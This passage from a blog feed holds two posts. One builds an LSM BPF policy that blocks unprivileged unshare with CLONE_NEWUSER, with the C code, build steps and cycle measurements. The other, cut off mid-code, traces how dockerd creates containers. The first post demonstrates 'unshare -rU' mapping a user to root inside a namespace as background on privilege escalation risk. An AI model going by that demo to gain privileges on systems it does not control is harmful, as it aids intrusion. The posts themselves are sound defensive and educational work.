it&amp;#39;s a foundation to having tools like Docker to not operate as true root, and things like rootless containers.&lt;/p&gt;&lt;p&gt;Due to its nature, allowing unpriviledged users access to USER namespace always carried a great security risk.  One such risk is privilege escalation.&lt;/p&gt;&lt;p&gt;Privilege escalation is a &lt;a href=&quot;https://www.cloudflare.com/learning/security/what-is-an-attack-surface/&quot;&gt;common attack surface&lt;/a&gt; for operating systems. One way users may gain privilege is by mapping their namespace to the root namespace via the unshare &lt;a href=&quot;https://en.wikipedia.org/wiki/System_call&quot;&gt;syscall&lt;/a&gt; and specifying the &lt;i&gt;CLONE_NEWUSER&lt;/i&gt; flag. This tells unshare to create a new user namespace with full permissions, and maps the new user and group ID to the previous namespace. You can use the &lt;a href=&quot;https://man7.org/linux/man-pages/man1/unshare.1.html&quot;&gt;unshare(1)&lt;/a&gt; program to map root to our original namespace:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;$ id
uid=1000(fred) gid=1000(fred) groups=1000(fred) …
$ unshare -rU
# id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
# cat /proc/self/uid_map
         0       1000          1&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In most cases using unshare is harmless, and is intended to run with lower privileges. However, this syscall has been known to be used to &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2022-0492&quot;&gt;escalate privileges&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;Syscalls &lt;i&gt;clone&lt;/i&gt; and &lt;i&gt;clone3&lt;/i&gt; are worth looking into as they also have the ability to &lt;i&gt;CLONE_NEWUSER&lt;/i&gt;. However, for this post we’re going to focus on unshare.&lt;/p&gt;&lt;p&gt;Debian solved this problem with this &lt;a href=&quot;https://sources.debian.org/patches/linux/3.16.56-1+deb8u1/debian/add-sysctl-to-disallow-unprivileged-CLONE_NEWUSER-by-default.patch/&quot;&gt;&amp;quot;add sysctl to disallow unprivileged CLONE_NEWUSER by default&amp;quot;&lt;/a&gt; patch, but it was not mainlined. Another similar patch &lt;a href=&quot;https://lore.kernel.org/all/1453502345-30416-3-git-send-email-keescook@chromium.org/&quot;&gt;&amp;quot;sysctl: allow CLONE_NEWUSER to be disabled&amp;quot;&lt;/a&gt; attempted to mainline, and was met with push back. A critique is the &lt;a href=&quot;https://lore.kernel.org/all/87poq5y0jw.fsf@x220.int.ebiederm.org/&quot;&gt;inability to toggle this feature&lt;/a&gt; for specific applications. In the article “&lt;a href=&quot;https://lwn.net/Articles/673597/&quot;&gt;Controlling access to user namespaces&lt;/a&gt;” the author wrote: “... the current patches do not appear to have an easy path into the mainline.” And as we can see, the patches were ultimately not included in the vanilla kernel.&lt;/p&gt;&lt;div&gt;
      &lt;h2&gt;Our solution - LSM BPF&lt;/h2&gt;
      
        
      
    &lt;/div&gt;&lt;p&gt;Since upstreaming code that restricts USER namespace seem to not be an option, we decided to use LSM BPF to circumvent these issues. This requires no modifications to the kernel and allows us to express complex rules guarding the access.&lt;/p&gt;&lt;div&gt;
      &lt;h3&gt;Track down an appropriate hook candidate&lt;/h3&gt;
      
        
      
    &lt;/div&gt;&lt;p&gt;First, let us track down the syscall we’re targeting. We can find the prototype in the &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/include/linux/syscalls.h#L608&quot;&gt;&lt;i&gt;include/linux/syscalls.h&lt;/i&gt;&lt;/a&gt; file. From there, it’s not as obvious to track down, but the line:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;/* kernel/fork.c */&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Gives us a clue of where to look next in &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/kernel/fork.c#L3201&quot;&gt;&lt;i&gt;kernel/fork.c&lt;/i&gt;&lt;/a&gt;. There a call to &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/kernel/fork.c#L3082&quot;&gt;&lt;i&gt;ksys_unshare()&lt;/i&gt;&lt;/a&gt; is made. Digging through that function, we find a call to &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/kernel/fork.c#L3129&quot;&gt;&lt;i&gt;unshare_userns()&lt;/i&gt;&lt;/a&gt;. This looks promising.&lt;/p&gt;&lt;p&gt;Up to this point, we’ve identified the syscall implementation, but the next question to ask is what hooks are available for us to use? Because we know from the &lt;a href=&quot;https://man7.org/linux/man-pages/man2/unshare.2.html&quot;&gt;man-pages&lt;/a&gt; that unshare is used to mutate tasks, we look at the task-based hooks in &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/include/linux/lsm_hooks.h#L605&quot;&gt;&lt;i&gt;include/linux/lsm_hooks.h&lt;/i&gt;&lt;/a&gt;. Back in the function &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/kernel/user_namespace.c#L171&quot;&gt;&lt;i&gt;unshare_userns()&lt;/i&gt;&lt;/a&gt; we saw a call to &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/kernel/cred.c#L252&quot;&gt;&lt;i&gt;prepare_creds()&lt;/i&gt;&lt;/a&gt;. This looks very familiar to the &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/include/linux/lsm_hooks.h#L624&quot;&gt;&lt;i&gt;cred_prepare&lt;/i&gt;&lt;/a&gt; hook. To verify we have our match via &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/kernel/cred.c#L291&quot;&gt;&lt;i&gt;prepare_creds()&lt;/i&gt;&lt;/a&gt;, we see a call to the security hook &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/security/security.c#L1706&quot;&gt;&lt;i&gt;security_prepare_creds()&lt;/i&gt;&lt;/a&gt; which ultimately calls the hook:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;…
rc = call_int_hook(cred_prepare, 0, new, old, gfp);
…&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Without going much further down this rabbithole, we know this is a good hook to use because &lt;i&gt;prepare_creds()&lt;/i&gt; is called right before &lt;i&gt;create_user_ns()&lt;/i&gt; in &lt;a href=&quot;https://elixir.bootlin.com/linux/v5.18/source/kernel/user_namespace.c#L181&quot;&gt;&lt;i&gt;unshare_userns()&lt;/i&gt;&lt;/a&gt; which is the operation we’re trying to block.&lt;/p&gt;&lt;div&gt;
      &lt;h3&gt;LSM BPF solution&lt;/h3&gt;
      
        
      
    &lt;/div&gt;&lt;p&gt;We’re going to compile with the &lt;a href=&quot;https://nakryiko.com/posts/bpf-core-reference-guide/#defining-own-co-re-relocatable-type-definitions&quot;&gt;eBPF compile once-run everywhere (CO-RE)&lt;/a&gt; approach. This allows us to compile on one architecture and load on another. But we’re going to target x86_64 specifically. LSM BPF for ARM64 is still in development, and the following code will not run on that architecture. Watch the &lt;a href=&quot;https://lore.kernel.org/bpf/&quot;&gt;BPF mailing list&lt;/a&gt; to follow the progress.&lt;/p&gt;&lt;p&gt;This solution was tested on kernel versions &amp;gt;= 5.15 configured with the following:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;BPF_EVENTS
BPF_JIT
BPF_JIT_ALWAYS_ON
BPF_LSM
BPF_SYSCALL
BPF_UNPRIV_DEFAULT_OFF
DEBUG_INFO_BTF
DEBUG_INFO_DWARF_TOOLCHAIN_DEFAULT
DYNAMIC_FTRACE
FUNCTION_TRACER
HAVE_DYNAMIC_FTRACE&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;A boot option &lt;code&gt;lsm=bpf&lt;/code&gt; may be necessary if &lt;code&gt;CONFIG_LSM&lt;/code&gt; does not contain “bpf” in the list.&lt;/p&gt;&lt;p&gt;Let’s start with our preamble:&lt;/p&gt;&lt;p&gt;&lt;i&gt;deny_unshare.bpf.c&lt;/i&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;linux/capability.h&amp;gt;
#include &amp;lt;linux/errno.h&amp;gt;
#include &amp;lt;linux/sched.h&amp;gt;
#include &amp;lt;linux/types.h&amp;gt;

#include &amp;lt;bpf/bpf_tracing.h&amp;gt;
#include &amp;lt;bpf/bpf_helpers.h&amp;gt;
#include &amp;lt;bpf/bpf_core_read.h&amp;gt;

#define X86_64_UNSHARE_SYSCALL 272
#define UNSHARE_SYSCALL X86_64_UNSHARE_SYSCALL&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Next we set up our necessary structures for CO-RE relocation in the following way:&lt;/p&gt;&lt;p&gt;&lt;i&gt;deny_unshare.bpf.c&lt;/i&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;…

typedef unsigned int gfp_t;

struct pt_regs {
	long unsigned int di;
	long unsigned int orig_ax;
} __attribute__((preserve_access_index));

typedef struct kernel_cap_struct {
	__u32 cap[_LINUX_CAPABILITY_U32S_3];
} __attribute__((preserve_access_index)) kernel_cap_t;

struct cred {
	kernel_cap_t cap_effective;
} __attribute__((preserve_access_index));

struct task_struct {
    unsigned int flags;
    const struct cred *cred;
} __attribute__((preserve_access_index));

char LICENSE[] SEC(&amp;quot;license&amp;quot;) = &amp;quot;GPL&amp;quot;;

…&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We don’t need to fully-flesh out the structs; we just need the absolute minimum information a program needs to function. CO-RE will do whatever is necessary to perform the relocations for your kernel. This makes writing the LSM BPF programs easy!&lt;/p&gt;&lt;p&gt;&lt;i&gt;deny_unshare.bpf.c&lt;/i&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;SEC(&amp;quot;lsm/cred_prepare&amp;quot;)
int BPF_PROG(handle_cred_prepare, struct cred *new, const struct cred *old,
             gfp_t gfp, int ret)
{
    struct pt_regs *regs;
    struct task_struct *task;
    kernel_cap_t caps;
    int syscall;
    unsigned long flags;

    // If previous hooks already denied, go ahead and deny this one
    if (ret) {
        return ret;
    }

    task = bpf_get_current_task_btf();
    regs = (struct pt_regs *) bpf_task_pt_regs(task);
    // In x86_64 orig_ax has the syscall interrupt stored here
    syscall = regs-&amp;gt;orig_ax;
    caps = task-&amp;gt;cred-&amp;gt;cap_effective;

    // Only process UNSHARE syscall, ignore all others
    if (syscall != UNSHARE_SYSCALL) {
        return 0;
    }

    // PT_REGS_PARM1_CORE pulls the first parameter passed into the unshare syscall
    flags = PT_REGS_PARM1_CORE(regs);

    // Ignore any unshare that does not have CLONE_NEWUSER
    if (!(flags &amp;amp; CLONE_NEWUSER)) {
        return 0;
    }

    // Allow tasks with CAP_SYS_ADMIN to unshare (already root)
    if (caps.cap[CAP_TO_INDEX(CAP_SYS_ADMIN)] &amp;amp; CAP_TO_MASK(CAP_SYS_ADMIN)) {
        return 0;
    }

    return -EPERM;
}&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Creating the program is the first step, the second is loading and attaching the program to our desired hook. There are several ways to do this: &lt;a href=&quot;https://github.com/cilium/ebpf&quot;&gt;Cilium ebpf&lt;/a&gt; project, &lt;a href=&quot;https://github.com/libbpf/libbpf-rs&quot;&gt;Rust bindings&lt;/a&gt;, and several others on the &lt;a href=&quot;https://ebpf.io/projects/&quot;&gt;ebpf.io&lt;/a&gt; project landscape page. We’re going to use native libbpf.&lt;/p&gt;&lt;p&gt;&lt;i&gt;deny_unshare.c&lt;/i&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;#include &amp;lt;bpf/libbpf.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;
#include &amp;quot;deny_unshare.skel.h&amp;quot;

static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args)
{
    return vfprintf(stderr, format, args);
}

int main(int argc, char *argv[])
{
    struct deny_unshare_bpf *skel;
    int err;

    libbpf_set_strict_mode(LIBBPF_STRICT_ALL);
    libbpf_set_print(libbpf_print_fn);

    // Loads and verifies the BPF program
    skel = deny_unshare_bpf__open_and_load();
    if (!skel) {
        fprintf(stderr, &amp;quot;failed to load and verify BPF skeleton\n&amp;quot;);
        goto cleanup;
    }

    // Attaches the loaded BPF program to the LSM hook
    err = deny_unshare_bpf__attach(skel);
    if (err) {
        fprintf(stderr, &amp;quot;failed to attach BPF skeleton\n&amp;quot;);
        goto cleanup;
    }

    printf(&amp;quot;LSM loaded! ctrl+c to exit.\n&amp;quot;);

    // The BPF link is not pinned, therefore exiting will remove program
    for (;;) {
        fprintf(stderr, &amp;quot;.&amp;quot;);
        sleep(1);
    }

cleanup:
    deny_unshare_bpf__destroy(skel);
    return err;
}&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Lastly, to compile, we use the following Makefile:&lt;/p&gt;&lt;p&gt;&lt;i&gt;Makefile&lt;/i&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-makefile&quot;&gt;CLANG ?= clang-13
LLVM_STRIP ?= llvm-strip-13
ARCH := x86
INCLUDES := -I/usr/include -I/usr/include/x86_64-linux-gnu
LIBS_DIR := -L/usr/lib/lib64 -L/usr/lib/x86_64-linux-gnu
LIBS := -lbpf -lelf

.PHONY: all clean run

all: deny_unshare.skel.h deny_unshare.bpf.o deny_unshare

run: all
	sudo ./deny_unshare

clean:
	rm -f *.o
	rm -f deny_unshare.skel.h

#
# BPF is kernel code. We need to pass -D__KERNEL__ to refer to fields present
# in the kernel version of pt_regs struct. uAPI version of pt_regs (from ptrace)
# has different field naming.
# See: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=fd56e0058412fb542db0e9556f425747cf3f8366
#
deny_unshare.bpf.o: deny_unshare.bpf.c
	$(CLANG) -g -O2 -Wall -target bpf -D__KERNEL__ -D__TARGET_ARCH_$(ARCH) $(INCLUDES) -c $&amp;lt; -o $@
	$(LLVM_STRIP) -g $@ # Removes debug information

deny_unshare.skel.h: deny_unshare.bpf.o
	sudo bpftool gen skeleton $&amp;lt; &amp;gt; $@

deny_unshare: deny_unshare.c deny_unshare.skel.h
	$(CC) -g -Wall -c $&amp;lt; -o [email protected]
	$(CC) -g -o $@ $(LIBS_DIR) [email protected] $(LIBS)

.DELETE_ON_ERROR:&lt;/code&gt;&lt;/pre&gt;&lt;div&gt;
      &lt;h3&gt;Result&lt;/h3&gt;
      
        
      
    &lt;/div&gt;&lt;p&gt;In a new terminal window run:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;$ make run
…
LSM loaded! ctrl+c to exit.&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In another terminal window, we’re successfully blocked!&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;$ unshare -rU
unshare: unshare failed: Cannot allocate memory
$ id
uid=1000(fred) gid=1000(fred) groups=1000(fred) …&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The policy has an additional feature to always allow privilege pass through:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;$ sudo unshare -rU
# id
uid=0(root) gid=0(root) groups=0(root)&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In the unprivileged case the syscall early aborts. What is the performance impact in the privileged case?&lt;/p&gt;&lt;div&gt;
      &lt;h3&gt;Measure performance&lt;/h3&gt;
      
        
      
    &lt;/div&gt;&lt;p&gt;We’re going to use a one-line unshare that’ll map the user namespace, and execute a command within for the measurements:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;$ unshare -frU --kill-child -- bash -c &amp;quot;exit 0&amp;quot;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;With a resolution of CPU cycles for syscall unshare enter/exit, we’ll measure the following as root user:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Command ran without the policy&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Command run with the policy&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;We’ll record the measurements with &lt;a href=&quot;https://docs.kernel.org/trace/ftrace.html&quot;&gt;ftrace&lt;/a&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;$ sudo su
# cd /sys/kernel/debug/tracing
# echo 1 &amp;gt; events/syscalls/sys_enter_unshare/enable ; echo 1 &amp;gt; events/syscalls/sys_exit_unshare/enable&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;At this point, we’re enabling tracing for the syscall enter and exit for unshare specifically. Now we set the time-resolution of our enter/exit calls to count CPU cycles:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;# echo &amp;#39;x86-tsc&amp;#39; &amp;gt; trace_clock&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Next we begin our measurements:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;# unshare -frU --kill-child -- bash -c &amp;quot;exit 0&amp;quot; &amp;amp;
[1] 92014&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Run the policy in a new terminal window, and then run our next syscall:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;# unshare -frU --kill-child -- bash -c &amp;quot;exit 0&amp;quot; &amp;amp;
[2] 92019&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Now we have our two calls for comparison:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;# cat trace
# tracer: nop
#
# entries-in-buffer/entries-written: 4/4   #P:8
#
#                                _-----=&amp;gt; irqs-off
#                               / _----=&amp;gt; need-resched
#                              | / _---=&amp;gt; hardirq/softirq
#                              || / _--=&amp;gt; preempt-depth
#                              ||| / _-=&amp;gt; migrate-disable
#                              |||| /     delay
#           TASK-PID     CPU#  |||||  TIMESTAMP  FUNCTION
#              | |         |   |||||     |         |
         unshare-92014   [002] ..... 762950852559027: sys_unshare(unshare_flags: 10000000)
         unshare-92014   [002] ..... 762950852622321: sys_unshare -&amp;gt; 0x0
         unshare-92019   [007] ..... 762975980681895: sys_unshare(unshare_flags: 10000000)
         unshare-92019   [007] ..... 762975980752033: sys_unshare -&amp;gt; 0x0&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;unshare-92014 used 63294 cycles.unshare-92019 used 70138 cycles.&lt;/p&gt;&lt;p&gt;We have a 6,844 (~10%) cycle penalty between the two measurements. Not bad!&lt;/p&gt;&lt;p&gt;These numbers are for a single syscall, and add up the more frequently the code is called. Unshare is typically called at task creation, and not repeatedly during normal execution of a program. Careful consideration and measurement is needed for your use case.&lt;/p&gt;&lt;div&gt;
      &lt;h2&gt;Outro&lt;/h2&gt;
      
        
      
    &lt;/div&gt;&lt;p&gt;We learned a bit about what LSM BPF is, how unshare is used to map a user to root, and how to solve a real-world problem by implementing a solution in eBPF. Tracking down the appropriate hook is not an easy task, and requires a bit of playing and a lot of kernel code. Fortunately, that’s the hard part. Because a policy is written in C, we can granularly tweak the policy to our problem. This means one may extend this policy with an allow-list to allow certain programs or users to continue to use an unprivileged unshare. Finally, we looked at the performance impact of this program, and saw the overhead is worth blocking the attack vector.&lt;/p&gt;&lt;p&gt;“Cannot allocate memory” is not a clear error message for denying permissions. We proposed a &lt;a href=&quot;https://lore.kernel.org/all/20220608150942.776446-1-fred@cloudflare.com/&quot;&gt;patch&lt;/a&gt; to propagate error codes from the &lt;i&gt;cred_prepare&lt;/i&gt; hook up the call stack. Ultimately we came to the conclusion that a new hook is better suited to this problem. Stay tuned!&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Docker Internal (3) | Blog</title>
<link>https://u1f383.github.io/linux/2026/06/04/Docker-Internal-3.html</link>
<guid isPermaLink="false">ItZsH2k9-sV8SYiZFIBI0E24MsD66ylbXpov6g==</guid>
<pubDate>Fri, 19 Jun 2026 10:24:09 +0000</pubDate>
<description>In the third post, we’ll discuss how the container is loaded.</description>
<content:encoded>&lt;p&gt;In the third post, we’ll discuss how the container is loaded.&lt;/p&gt;&lt;p&gt;Since the vulnerability I found has not yet been patched 😢, I won’t discuss how the NVIDIA toolkit can work as a replacement runtime in this post. I’ll cover it in a future post once the bug has been fixed.&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://u1f383.github.io/assets/image-20260604000000000.png&quot; alt=&quot;image-20260604000000000&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;h2&gt;1. Load a Container&lt;/h2&gt;&lt;p&gt;If you run &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;docker run --rm -it ubuntu:24.04&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt; will receive two HTTP requests. The first is to create a container, which is the same as executing &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;docker create ubuntu:24.04&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;POST /v1.54/containers/create HTTP/1.1
Host: api.moby.localhost
User-Agent: Docker-Client/29.5.2 (linux)
Content-Length: 1711
Content-Type: application/json
...&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;The second is to start the container, which is the same as executing &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;docker start &amp;lt;container_id&amp;gt;&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;POST /v1.54/containers/17b7029c5b5121a40ef71d91640fff00f20152df0b167a4464c02450c208b8a1/start HTTP/1.1
Host: api.moby.localhost
User-Agent: Docker-Client/29.5.2 (linux)
Content-Length: 0&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt;’s &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;initRoutes()&lt;/code&gt; defines both endpoint handlers, and we’ll read their implementation later.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/server/router/container/container.go
func (c *containerRouter) initRoutes() {
    c.routes = []router.Route{
        // [...]
        router.NewPostRoute(&amp;quot;/containers/create&amp;quot;, c.postContainersCreate),
        // [...]
        router.NewPostRoute(&amp;quot;/containers/{name:.*}/start&amp;quot;, c.postContainersStart),
        // [...]
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h3&gt;1.1. Create&lt;/h3&gt;&lt;p&gt;The request data is a JSON-formatted data that includes the container’s configuration. The actual data looks like:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;{
  &amp;quot;Hostname&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;Domainname&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;User&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;AttachStdin&amp;quot;: false,
  &amp;quot;AttachStdout&amp;quot;: true,
  &amp;quot;AttachStderr&amp;quot;: true,
  &amp;quot;Tty&amp;quot;: false,
  &amp;quot;OpenStdin&amp;quot;: false,
  &amp;quot;StdinOnce&amp;quot;: false,
  &amp;quot;Env&amp;quot;: null,
  &amp;quot;Cmd&amp;quot;: null,
  &amp;quot;Image&amp;quot;: &amp;quot;ubuntu:24.04&amp;quot;,
  &amp;quot;Volumes&amp;quot;: {},
  &amp;quot;WorkingDir&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;Entrypoint&amp;quot;: null,
  &amp;quot;Labels&amp;quot;: {},
  &amp;quot;HostConfig&amp;quot;: {
    &amp;quot;Binds&amp;quot;: null,
    &amp;quot;ContainerIDFile&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;LogConfig&amp;quot;: {
      &amp;quot;Type&amp;quot;: &amp;quot;&amp;quot;,
      &amp;quot;Config&amp;quot;: {}
    },
    &amp;quot;NetworkMode&amp;quot;: &amp;quot;default&amp;quot;,
    &amp;quot;PortBindings&amp;quot;: {},
    &amp;quot;RestartPolicy&amp;quot;: {
      &amp;quot;Name&amp;quot;: &amp;quot;no&amp;quot;,
      &amp;quot;MaximumRetryCount&amp;quot;: 0
    },
    &amp;quot;AutoRemove&amp;quot;: false,
    &amp;quot;VolumeDriver&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;VolumesFrom&amp;quot;: null,
    &amp;quot;ConsoleSize&amp;quot;: [
      50,
      212
    ],
    &amp;quot;CapAdd&amp;quot;: null,
    &amp;quot;CapDrop&amp;quot;: null,
    &amp;quot;CgroupnsMode&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;Dns&amp;quot;: null,
    &amp;quot;DnsOptions&amp;quot;: [],
    &amp;quot;DnsSearch&amp;quot;: [],
    &amp;quot;ExtraHosts&amp;quot;: null,
    &amp;quot;GroupAdd&amp;quot;: null,
    &amp;quot;IpcMode&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;Cgroup&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;Links&amp;quot;: null,
    &amp;quot;OomScoreAdj&amp;quot;: 0,
    &amp;quot;PidMode&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;Privileged&amp;quot;: false,
    &amp;quot;PublishAllPorts&amp;quot;: false,
    &amp;quot;ReadonlyRootfs&amp;quot;: false,
    &amp;quot;SecurityOpt&amp;quot;: null,
    &amp;quot;UTSMode&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;UsernsMode&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;ShmSize&amp;quot;: 0,
    &amp;quot;Isolation&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;CpuShares&amp;quot;: 0,
    &amp;quot;Memory&amp;quot;: 0,
    &amp;quot;NanoCpus&amp;quot;: 0,
    &amp;quot;CgroupParent&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;BlkioWeight&amp;quot;: 0,
    &amp;quot;BlkioWeightDevice&amp;quot;: [],
    &amp;quot;BlkioDeviceReadBps&amp;quot;: [],
    &amp;quot;BlkioDeviceWriteBps&amp;quot;: [],
    &amp;quot;BlkioDeviceReadIOps&amp;quot;: [],
    &amp;quot;BlkioDeviceWriteIOps&amp;quot;: [],
    &amp;quot;CpuPeriod&amp;quot;: 0,
    &amp;quot;CpuQuota&amp;quot;: 0,
    &amp;quot;CpuRealtimePeriod&amp;quot;: 0,
    &amp;quot;CpuRealtimeRuntime&amp;quot;: 0,
    &amp;quot;CpusetCpus&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;CpusetMems&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;Devices&amp;quot;: [],
    &amp;quot;DeviceCgroupRules&amp;quot;: null,
    &amp;quot;DeviceRequests&amp;quot;: null,
    &amp;quot;MemoryReservation&amp;quot;: 0,
    &amp;quot;MemorySwap&amp;quot;: 0,
    &amp;quot;MemorySwappiness&amp;quot;: -1,
    &amp;quot;OomKillDisable&amp;quot;: false,
    &amp;quot;PidsLimit&amp;quot;: 0,
    &amp;quot;Ulimits&amp;quot;: [],
    &amp;quot;CpuCount&amp;quot;: 0,
    &amp;quot;CpuPercent&amp;quot;: 0,
    &amp;quot;IOMaximumIOps&amp;quot;: 0,
    &amp;quot;IOMaximumBandwidth&amp;quot;: 0,
    &amp;quot;MaskedPaths&amp;quot;: null,
    &amp;quot;ReadonlyPaths&amp;quot;: null
  },
  &amp;quot;NetworkingConfig&amp;quot;: {
    &amp;quot;EndpointsConfig&amp;quot;: {
      &amp;quot;default&amp;quot;: {
        &amp;quot;IPAMConfig&amp;quot;: null,
        &amp;quot;Links&amp;quot;: null,
        &amp;quot;Aliases&amp;quot;: null,
        &amp;quot;DriverOpts&amp;quot;: null,
        &amp;quot;GwPriority&amp;quot;: 0,
        &amp;quot;NetworkID&amp;quot;: &amp;quot;&amp;quot;,
        &amp;quot;EndpointID&amp;quot;: &amp;quot;&amp;quot;,
        &amp;quot;Gateway&amp;quot;: &amp;quot;&amp;quot;,
        &amp;quot;IPAddress&amp;quot;: &amp;quot;&amp;quot;,
        &amp;quot;MacAddress&amp;quot;: &amp;quot;&amp;quot;,
        &amp;quot;IPPrefixLen&amp;quot;: 0,
        &amp;quot;IPv6Gateway&amp;quot;: &amp;quot;&amp;quot;,
        &amp;quot;GlobalIPv6Address&amp;quot;: &amp;quot;&amp;quot;,
        &amp;quot;GlobalIPv6PrefixLen&amp;quot;: 0,
        &amp;quot;DNSNames&amp;quot;: null
      }
    }
  }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;postContainersCreate()&lt;/code&gt; first decodes the request into three different configs [1] and then creates a container based on these configs [2].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/server/router/container/container_routes.go
func (c *containerRouter) postContainersCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
    // [...]
    req, err := runconfig.DecodeCreateRequest(rdr, c.backend.RawSysInfo())
    config, hostConfig, networkingConfig := req.Config, req.HostConfig, req.NetworkingConfig // [1]
    // [...]
    ccr, err := c.backend.ContainerCreate(ctx, backend.ContainerCreateConfig{ // [2]
        Name:                        name,
        Config:                      config,
        HostConfig:                  hostConfig,
        NetworkingConfig:            networkingConfig,
        Platform:                    platform,
        DefaultReadOnlyNonRecursive: defaultReadOnlyNonRecursive,
    })
    // [...]
